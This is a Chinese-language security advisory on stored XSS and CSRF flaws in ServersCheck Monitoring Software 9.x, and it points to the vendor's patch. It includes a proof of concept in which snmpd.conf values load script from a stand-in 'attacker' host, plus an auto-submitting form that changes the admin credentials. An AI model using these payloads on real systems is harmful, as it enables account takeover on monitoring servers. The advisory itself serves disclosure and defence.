ServersCheck Monitoring Software脚本插入漏洞
ServersCheck Monitoring Software脚本插入漏洞
发布日期:2012-10-12
更新日期:2012-10-16
受影响系统:
ServersCheck Monitoring Software ServersCheck Monitoring Software 9.x
描述:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software是网络监控和服务器监控软件。
ServersCheck Monitoring Software存在安全漏洞,通过"syslocation" 、"syscontact"参数传递的输入没有正确过滤即显示给用户,可被利用插入任意HTML和脚本代码。
<*来源:loneferret
链接:http://secunia.com/advisories/50959/
http://www.exploit-db.com/exploits/21866/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>
# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body onload="trigger()">
<script>
function trigger() {
document.getElementById('bad_form').submit();
}
</script>
<form id="bad_form" method="post" action="http://target:1272/settings2.html">
<input name="systemsetting" value="secure" type="hidden">
<input name="setting" value="SECURE" type="hidden">
<input value="ok" name="changedsettings" type="hidden">
<input name="systemsetting" value="SECURE" type="hidden">
<input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
<input name="adminpass" size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
ServersCheck Monitoring Software
--------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.serverscheck.dk/monitoring_software/release.asp
评论暂时关闭